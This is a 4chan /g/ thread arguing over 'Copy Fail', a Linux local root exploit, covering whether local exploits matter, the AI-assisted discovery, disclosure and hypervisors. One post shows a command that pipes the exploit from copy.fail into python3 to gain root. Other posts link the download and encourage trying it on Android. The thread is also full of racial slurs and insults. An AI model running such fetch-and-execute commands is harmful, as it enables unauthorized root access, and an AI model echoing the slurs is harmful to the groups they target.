>>108721164
ai hallucination fake and gay

>>108721164
Why do lincels care so much about privilege escalation? If someone got read and write access to all my user files they already won.

>>108721164
Its true, it works on almalinux 10 and ubuntu 24.04 on new unprivileged users i just created.

We should just assume we are running commodore 64s connected to the internet.

don't care. using linux-hardened

>>108721164
Just don't install dumb python scripts made by some AI?

>>108721184
Hacker humiliation ritual. They get access to your box but can’t steal anything important and have to read through all your files for credentials but just get pepes and anime girl reaction pics.

>>108721188
>just stop using python bro

>>108721202
the script has to get executed on your machine somehow, its not magic

hackers have to do all this work to get root but all I have to do is type sudo
why do they make it seem like such a big deal?

>>108721208
Sadly apache doesn’t have that many sudo privileges.

>>108721164
Laughs in Windows11

>>108721206
>on your machine
you are thinking in a very unemployed way, nobody cares about your hentai shitbox at home

the fact is millions of employees and students have access to a Linux box at work/college/school/company but they got a regular user just for their work use case. with this they can just bypass it.

File: 1758593183996796.jpg (29 KB, 600x527)

29 KB JPG

>>108721230

>AI found
And who verified it?

>>108721185
>running commodore 64s connected to the internet
sounds based

>>108721197
That's why I always chmod 777 every file I download

>patch today
this shit has been fixed for almost an entire month

>>108721263
Your dad who works at Nintendo. He's submitting his findings as soon as he gets back from buying cigarettes.

>>108721269
Don’t forget to set the suid bit as well

>>108721164
Here's the website about the exploit with download: https://copy.fail/
>>108721270
For 6.18 and up, Ubuntu 24.04 still ships with 6.17

File: 1712194994759.png (806 KB, 1150x1333)

806 KB PNG

>>108721164
Fucking hell, again???

File: file.png (15 KB, 949x193)

15 KB PNG

>>108721298
Wow, hacking is so easy!

>>108721331
1337

>>108721164
It's in a module that's not widely used (algif_aead), so easy to just blacklist it.

>>108721164
doesn't work on my linux from scratch personal distro

>>108721298
>Ubuntu
don't care only subhumans use ubuntu

>>108721202
Fine with me. Every program I use was compiled with C or C++ or Rust, or some other low level language. Python is bloat and shouldn't exist.

File: file.png (656 KB, 736x736)

656 KB PNG

>>108721331
>runs a script he didn't write
>using exploits he never found
>didn't even look at the code
>I'm a hackert!
>Hacking is so easy!

>>108721164
Curious as to how these 732 bytes of python run on my machine which I have not downloaded anything with for more than 3 years?

NEVER update.

>>108721427
>I have not downloaded anything with for more than 3 years
but this exploit goes back 9 years

>>108721433
What I am asking is
How do these 732 bytes of python
Manage to run
On my machine?
How do they get there?
Who runs them?

File: 1712257525988.png (98 KB, 498x281)

98 KB PNG

>>108721415
Sorry, I can't hear you from inside the mainframe.

>>108721164
fake and ghey

>>108721415
AI found the exploit so we actually all pitched in with our scraped data.

>>108721353
>i have a hax and ALL LINUXS AFFECTED!!!!
>look closer
>literal who driver deployed on two (2) systems worldwide
Every Linux vuln is a nothingburger overhyped by, may Allah forgive me for saying these words, infosec journalists.

>>108721164
That sounds huge.
>https://nvd.nist.gov/vuln/detail/CVE-2026-31431
>CVSS Score: 7.8
wait what

>>108721164
Imagine using an OS that connects to the internet

>>108721164
it's not remote and debian is basically immune to it by default unless you load certain modules which don't seem to be loaded on any of my machines

>>108721687
All distros are immune to it if you have a normal computer it seems

>>108721637
If an attacker has a shell on your machine then it's kind of assumed you're pretty fucked regardless. It's naturally not going to rate quite as high as a big widespread RCE or something

>>108721708
>If an attacker has a shell on your machine
>your machine

see >>108721247

>>108721164
>muh AI
from https://copy.fail/#faq
>Was this AI-found?
>AI-assisted. The starting insight — that splice() hands page-cache pages into the crypto subsystem and that scatterlist page provenance might be an under-explored bug class — came from human research by Taeyang Lee at Xint.
>From there, Xint Code scaled the audit across the entire crypto/ subsystem in roughly an hour. Copy Fail was the highest-severity finding in the run.

also, from the write-up:
>This finding was AI-assisted, but began with an insight from Theori researcher Taeyang Lee, who was studying how the Linux crypto subsystem interacts with page-cache-backed data. He used Xint Code to scale his research across the entire crypto subsystem, and Copy Fail was the most critical finding in the report.

>>108721184
>Why do lincels care so much about privilege escalation?
>my user files
because this isn't about retards like you, LPEs are about taking control of servers and stealing info (passwords, credentials, etc.) to gain access to other machines in the network.

>>108721188
>>108721206
it's a local privilege escalation that can be run from binaries, bash script or whatever else you can run shit in a linux machine, retard

>>108721706
hmm, seems like a nothingburger then

>>108721188
Dumbass, the python is the script to take down the Linux kernel which is C.

>>108721197
Don't sleep on privEsc

>>108721202
That is the wrong idea. Read the post again. You use python to perform the hack as a red teamer.

>>108721206
>>108721247
You guys, i think this is getting outta hand

>>108721206
Long way of saying "it's a privesc"

>>108721164
Can this be used to get root on Android without unlocking the bootloader?

>>108721833
Only one way to find out anon. Someone needs to try it. But yes, yes it can

>>108721833
Actually, maybe it won't work on Android because your phone uses a custom kernel. You could try though!

>>108721164
let me guess, they need physical access on my unlock laptop with root password on a post-it note?

>>108721851
>though
Hello FBI

>>108721833
My phone is safe
[Code]# CONFIG_CRYPTO_USER_API_AEAD is not set[/code]

>>108721164
Another security exploit that is only useful on a lab environment. In any real world server, SSH is not directly exposed to the internet. Therefore the only way to use this "exploit" is to get into the server intranet, hack SSH's password-less system (+ 2nd auth factor) and only then run this.

Which is completely unnecessary, since every system that adopt this configuration already has NOPASSWD: ALL for the unprivileged user.

>>108722268

see >>108721247

File: 1528483123464.gif (1.84 MB, 384x372)

1.84 MB GIF

>>108721247
>finally i can have root access on a linux kiosk

>>108722324
naka-dashi aqua

>>108722324
>actually gaining root access is actually good

> $ curl https://copy.fail/exp | python3 && su
  % Total    % Received % Xferd  Average Speed  Time    Time    Time   Current
                                 Dload  Upload  Total   Spent   Left   Speed
100    731   0    731   0      0   7849      0                              0
Traceback (most recent call last):
  File "<stdin>", line 8, in <module>
FileNotFoundError: [Errno 2] No such file or directory: '/usr/bin/su'

foiled again

All Linux security relies on some volunteer reading the bug reports, meanwhile Microsoft, Apple and Google have dedicated cybersecurity departments.

>>108721247
>>108722291
Bullshit. Every such shared environment confines each user inside something like a container. I've set up plenty of school/university servers and they all used containers. Again, these local exploits are a nonissue.

reminder, an AI found this exploit
we're so fucked

>>108722460
>something like a container
cool Duning Kruger terminology bro
can you elaborate?
pro tip: you wont

>>108722521
Reading is so hard.

"Was this AI-found?

AI-assisted. The starting insight — that splice() hands page-cache pages into the crypto subsystem and that scatterlist page provenance might be an under-explored bug class — came from human research by Taeyang Lee at Xint.

From there, Xint Code scaled the audit across the entire crypto/ subsystem in roughly an hour. Copy Fail was the highest-severity finding in the run."

>>108721164
So we need to use systemd, is that right? Everybody needs to use systemd for now on

>>108722604
how come Linux\Kernel devs dont comb through the code with AI tools so we wont get these anymore? How come we only see reports from shitass third party companies?

>>108721164
WindowsGAWDS can't stop winning

>>108721298
>what is backport :S

>>108722660
the likes of torvalds hate AI

>>108721164
Good thing I'm on BSD

>AI has found
Yeah, but is it real?

>>108721164
Excuse me hon, Linux doesn't need to be secure. We have privacy with Linux. Corporate surveillance is no more with Linux and that's the thing that matters.

>>108721749
>Xint Code supports an "operator prompt" which (optionally) allows a human operator to provide additional context to guide the automated scan. In this case, the operator prompt was quite simple:

>This is the linux crypto/ subsystem. Please examine all codepaths reachable from userspace syscalls. Note one key observation: splice() can deliver page-cache references of read-only files (including setuid binaries) to crypto TX scatterlists.

So it really is "muh ai" you stupid obnoxious american cunt

>>108721164
Local exploits are dime a dozen.

>>108723038
buy an advertisement on 4chan, Xint Code.
https://www.4chan.org/advertise

>>108723038
>PackageKit as a candidate initially caught our attention when we observed that a pkcon install command could install a system package without requiring a password on a Fedora Workstation. Starting in 2025, we began investigating whether this behavior could be abused to achieve arbitrary package installation. By guiding the AI-assisted research into a specific direction (using Claude Opus by Anthropic) we were able to discover an exploitable vulnerability. The finding was manually reviewed and verified before being responsibly reported to the PackageKit maintainers, who confirmed the issue and its exploitability.

nigger

>>108723044
show me some then, log into a random user and escalate to root

>>108722400
LMAOOOOOOOOO

Literally doesn't matter. Even most KEV's are a nothing burger that only affects an extremely small niche case. Even EPSS on KEV's is still an astronomically small risk.

>>108723109
this is exploitable on any major distro out of the box what are you talking about

>AttributeError: module 'os' has no attribute 'splice'

Odd choice to rely on a fairly new version of Python here.

>>108721247
>they can just bypass it.
They can't. Allow listing won't allow you to run fuckmyshit.py

>>108721164
Why would an operating system written in inherently unsafe programming language be safer than the competition written in just as unsafe languages?
It was always wishful thinking cope from freetards who had to have some advantage (even imagined made-up one) seeing how inferior desktop Linux is compared to commercial solutions.

>Was this AI-found?
>AI-assisted. The starting insight — that splice() hands page-cache pages into the crypto subsystem and that scatterlist page provenance might be an under-explored bug class — came from human research by Taeyang Lee at Xint.
Why are you lying op?

>>108723212
>2021
>fairly new
besides, it's just a proof of concept

File: 1516300067979.png (164 KB, 500x576)

164 KB PNG

>>108721164
>732 byte python script
What a retarded and pointless metric to advertise.
Even though the vuln is real the whole thing is LLM slop, there's minification in the PoC that doesn't even save bytes and they hallucinated the RHEL version they tested the exploit on.

>>108723084
>>108722296

>>108722268
>In any real world server, SSH is not directly exposed to the internet.
Lmao. You could also just get a shell on the server itself.

>>108721164
>upstream fix is mainline commit a664bf3d603d, which reverts the 2017 optimisation. It was committed on 1 April 2026
My kernel is more recent than that (6.18.22 LTS), so ig I'm in the clear.
t. Gentoo

>>108721438
no one. which is why LPE exploits are a meme. an attacker needs to first find a way to run code on your machine and then use this to gain higher access

>>108725720
or said another way, if a local privilege escalation was worth anything this exploit would have been sold instead of posted to the public

>>108722460
Wtf is a container in user context, doesnt exist

File: maxresdefault.jpg (178 KB, 1280x720)

178 KB JPG

>>108721307

>>108721164
Does this let you escape namespaces?

They didn't disclose this to any of the distro maintainers before making it public lol

>>108726124
better publicity if they fuck everyone over. buy their security tool!!!

>>108726124
Because they aren't trying to improve anything, just get a headline out there

>>108721164
Did they manage to create a proof of concept? Yeah, I thought so. Just jeets trying to pretend they are security researchers.

>>108721164
What always amuses me is how whenever shit like this hits the tech world, these things always happen:
>every journoscum outlet that'll report on the smallest of issues with Windows will stay dead silent about it because it's bad juju to talk ill of Linux, even if it's true (see the radio silence on the xz backdoor)
>Linuxfags will go into full damage control mode as they cannot comprehend that Linux systems are so complex they'll always have exploits like these
>often contradicting themselves and showing the most obvious, nonsensical double standards when drawing comparisons to Windows (they can never ever say that Linux is the same or worse to Windows in any metric)
>you'll never find any voices of reason that actually understand computers that'll say how it is, only the Dunning-Kruger retards that see everything in some black-and-white tribe war
Never ceases to amuse me.

>>108721749
>AI-assisted. The starting insight — that splice() hands page-cache pages into the crypto subsystem and that scatterlist page provenance might be an under-explored bug class — came from human research by Taeyang Lee at Xint.
>From there, Xint Code scaled the audit across the entire crypto/ subsystem in roughly an hour. Copy Fail was the highest-severity finding in the run.

YEah, this, this is just AI-assisted fuzzing. Fuzzing has been finding vulnerabilities since literally the 80s.

>>108723038
read >>108726496
you tech-illiterate retard.

I knew /g/ was retarded but holy fuck this thread is filled with absolute knuckle dragging retards.
This is a genuine security issue for anyone who manages shared Linux environments (anyone who isn't a NEET and uses Linux).
Arch and Gentoo derivatives aren't affected because there was a kernel patch a month ago, but mainstream distros like RHEL and Ubuntu are vulnerable because they don't have a patched kernel released yet.

>>108723038
It almost looks like he instructed the ai where to find the vuln

>>108726693
you sure about that? the gentoo devs were bitching that they weren't informed and were busy providing a fix.

File: file.png (73 KB, 274x184)

73 KB PNG

>>108721415
hack deez nuts, nigga!

>>108726693
People have no idea how little fucks are given about IT and security most organizations give.
My company printed some flyers for a bunch of local businesses/government 10+ years ago and that makes us the closest thing to IT staff they have. They've got random PHP4/5 websites running riddled with exploits but no matter how much we scream at them they don't want to pay for updates.
I've spent the last two months keeping a horrible broken online store alive after the one-man hoster went bankrupt. Day one I found a fucking ten year old RCE on the system and it's only gotten worse.

This will just screw smaller businesses sitting on some shared hosting because someone in there will have an infested website.

>>108724150
it imports os, zlib and socket which would be millions of lines of code.

>>108726788
There's a real long-standing issue with code quality. And then AI showed up and totally improved the situation.

>>108726788
Many such cases
At the time 4chan got hacked, its servers were running an OS that had reached EOL in 2016.

File: 1704358335850097.jpg (37 KB, 1024x989)

37 KB JPG

>>108721164
I thought linux didn't have viruses.

Winbros, are we back on top?

File: 1768120999368733.jpg (42 KB, 519x519)

42 KB JPG

>sitting quietly in the linux kernel for nine years
that's assuming Mossad didn't know about it first (they probably implanted it themselves)

>>108721188
The exploit can be used in any language with access to syscalls.

>>108727055
i hate this line. linux ALWAYS had viruses and vulnerabilities. I can't believe people are downloading linux for torrenting under the belief key loggers or remote code can't possibly run on linux.

>>108722268
>NOPASSWD: ALL for the unprivileged user
What do you mean, doesn't that make sudo work without the password?

>>108727152
Right. The thing is that windows was always worse. And for people who know how to use computers, Linux exploits can often be fixed by the users before even an official patch is released. Meanwhile on windows you often have no choice but to sit on your thumbs until MS releases a hotfix.

>>108722268
No, you're missing the forest for the trees. If you can chain this with another exploit such as an unprivileged RCE, you just got root access. There are plenty like that with PHP right now

>>108721164
>on every mainstream linux box
>since 2017
sounds like systemd

>>108727194
ok reading up on it (it was more annoying to find the writeup than it should be) it was not systemd this time to be fair

>>108727088
The new trend going forward is going to be hit and run supply chain attacks because exploit analysis is going to be too stronk with AI tools.

Nothingburger, just don't execute untrusted binaries/scripts?

>>108721307
>someordinarygamers
now that's a jeet i haven't seen in a long time

www.youtube.com##yt-lockup-view-model:has-text("SomeOrdinaryGamers")

>>108727186
fake news.

if you do responsible disclosure to microsoft, microsoft will update windows in time.
meanwhile in linux the linux kernel will not talk to distros (security-bugs-are-just-bugs meme). you end up in this retarded situation where the exploit is in the wild, the linux kernel is in theory patched but no distro did bother to update the kernel yet because no distro knew about any security issue.
https://www.openwall.com/lists/oss-security/2026/04/30/10

OPEN SORES

>>108729341
I thought he got exposed as a sham, why the fuck is he popular again?

>>108729538
he fills an alarmingly large niche i can only describe as tech midwits
his average viewer is probably IQ 110

>>108729439
Not fake news, hard experience from a 30 year career in tech dealing with both operating systems in a variety of environments, vs a forum troll who makes OS wars his identity.

>>108727186
>Linux exploits can often be fixed by the users before even an official patch is released.
I'm a Linux beginner and even I was able to figure out how to protect myself from CVE-31431.
Not that I even needed to, because nothing on my system even uses the kernel module that is affected.
But, better safe than sorry.
In a matter of days, this will get patched out and next to nobody will be affected.

>>108721164
its been patched a long time ago
>>108721187
pretty sure hardened doesnt help with this
>>108721188
its not a python thing they just used python because everyone knows it and its easy to demo with

updooting your kernel seems to be the best solution

File: 1760450173917786.jpg (25 KB, 450x419)

25 KB JPG

>LPE

>vuln
>vuln
>vuln
Stop calling it that, you fucking niggers. I swear to Christ if I have to interact with you apes speaking your fucking niggerspeak anymore I'm changing my SSH port to 1488. Stop speaking like chimps, for fuck's sake.

>>108730495
0-day!

>>108727170
It does. People use it when the authentication is essentially only the SSH key plus potentially a 2fa. It's already strong enough that you don't need the password, and the passwords just unnecessarily complicates things. Common setup for Ansible.
He's saying that if you got through intranet and SSH, then 1) almost certainly no you didn't, and 2) in the scenario where you did, your LPE is pointless because sudo is already available without a password in most cases.
It's like if you told me you knew how the pick the lock on my kitchen cupboard, but I have a series of moats, landmines and wild animals outside my house, and also a gun, and also I don't have a lock on my kitchen cupboard.

>>108722649
It has nothing to do with the presence or absence of systemd. I don't know why you thought it did.
>>108722867
No, he doesn't. He has used AI to write code before.

>>108730973
Thank you.

>>108723084
>log into a random user
That's the actually hard part. That is the entire point of holding that these privilege escalation exploits aren't that big of a deal.

>>108730995
Every seedbox out there running linux and allowing regular users to ssh into it. I could log into my seedbox, pwn it, then introduce malware into everyones download folders and have them pull the files down and literally return to "britney_spears_naked.jpg.exe"

>>108721230
Linux can be hacked is still better than installing Malware as an OS

>>108731065
Those are VPSs, right? You're inside a hypervisor so I don't it will work how you're expecting it to work.
If it doesn't have hypervisor or physical separation, then yes, that would be an issue, but I don't think that kind of shared server is very common.
You should try it with your seedbox. I don't think it will work, but it might be interesting. It is still one more layer peeled back though so you do have a point. It's not a complete freak-out incident which I'm sure the company this whole thing is an ad for would like it to be, but it's something that could be a problem combined with local access and also a hypervisor vulnerability.
Getting root on your own seedbox is also not nothing, but yeah, not a concern for me personally.

>>108731130
>I don't think that kind of shared server is very common
it is, actually

>>108731065
root is useless on a properly protected machine, ie https://play.pujol.io/

You can have root ssh access and still won't be able to do anything.

>>108731139
Oh, really? Where? Servers with low local access requirements, vulnerable to this exploit (which seems to be most of them), and also not having any hypervisor despite that.
I had a quick search about seedboxes, and I'm reading they're pretty much all either discrete physical machines, or much more commonly, VPSs with hypervisors. I could well be wrong though.

>>108731153
>properly protected machine
Useless comment. Different servers are used for different purposes, unless you're sandboxing the entire kernel in a virtual machine. You can't always fully protect from a malicious attacker with root access for a reasonable price.

>>108731155
>>108731130
I don't think you understand computers or at least hosting on a fundamental level
what does a hypervisor have to do with me loging into a machine (virtual or not) and fucking shit up?

>>108731233
I don't think you understand computers or at least hosting on a fundamental level

>>108731233
Because the hypervisor is a wall between your root access, and root access on someone else's machine.
You said you'd be able to go and write files in someone else's download folder once you had root, but I don't think you will. I understand that you could potentially get root within your own hypervisor, but you'd need to also escape the hypervisor to do anything to anyone else's files.
If that isn't how you think that would happen, what am I missing?

File: 1769887297424715.jpg (127 KB, 1200x775)

127 KB JPG

>>108731233
>I don't think you understand computers or at least hosting on a fundamental level
If you are in a vm/under hypervisor you'll need to break out of vm/hypervisor to fuck someone else's shit up.

>>108731266
>>108731264
there are tons of baremetal servers exposed out there, thinking everything is a vm like in your $2 vps setup is quite a stretch.


also you're forgetting the millions of webdev/shitapps like mongodb redis postgres elasticsearch that come with their own dedicated system users nowadays so it's pretty easy now for any malware to breakout of their respective packages and gain root. if an attacker can execute code as one of them via some app exploit, then they are exactly the kind of unprivileged local user this CVE applies to.

>>108731354
holy shit you have redditor tier goldfish brain and completely ignored the original comment you replied to

>>108731354
Must be baremetal and have multiple users on the same machine. It's not a matter of getting baremetal being "premium" or whatever you're trying to imply there. If I'm on a shared machine, I want there to be a hypervisor. It is a downside if there isn't, for exactly this reason. That is why shared machines have hypervisors. If i'm not on a shared machine, this is no longer a relevant line of attack, where I have to be worried about other local users.
On the system users thing, yes, but then we're back to how it's quite difficult to gain local access again. You can't make a point about how easy local access is in one case, then start chaining that with other arguments where local access is not easy at all. Many people make local access their main line of defense, and only in cases where you can't do that and maintain functionality, like VPSs or other shared servers, do they move that line somewhere else, typically to containers, because root access is such a difficult wall to patch up. That's the original point. Privilege escalation is common.
Did you not realise that hypervisors were a wall then, based on what you wrote here? (>>108731233) It kind of seems like you're in unfamiliar territory, but acting like you're some kind of expert, which is silly.

>>108721164
most of these exploits sound scary until you understand the user needs local access.
"The Hacker Is With You In The House!"
iow you got much bigger problems if you're in a position to get pwned by this.
probably a problem for corporate environments where you actually have separate users and security tho, but how many of them use loonix?

>>108731917
this has been patched a month ago

>>108731917
>the user needs local access
or a shitty wordpress install (there are 500+ million) where you run composer or npm once and you get rekt

>>108731172
>unless you're sandboxing the entire kernel in a virtual machine
you are wrong, ffs just read the link i sent...
A well strengthened system won't let you do anything even as root.
Without any virtualisation or sandbox bs.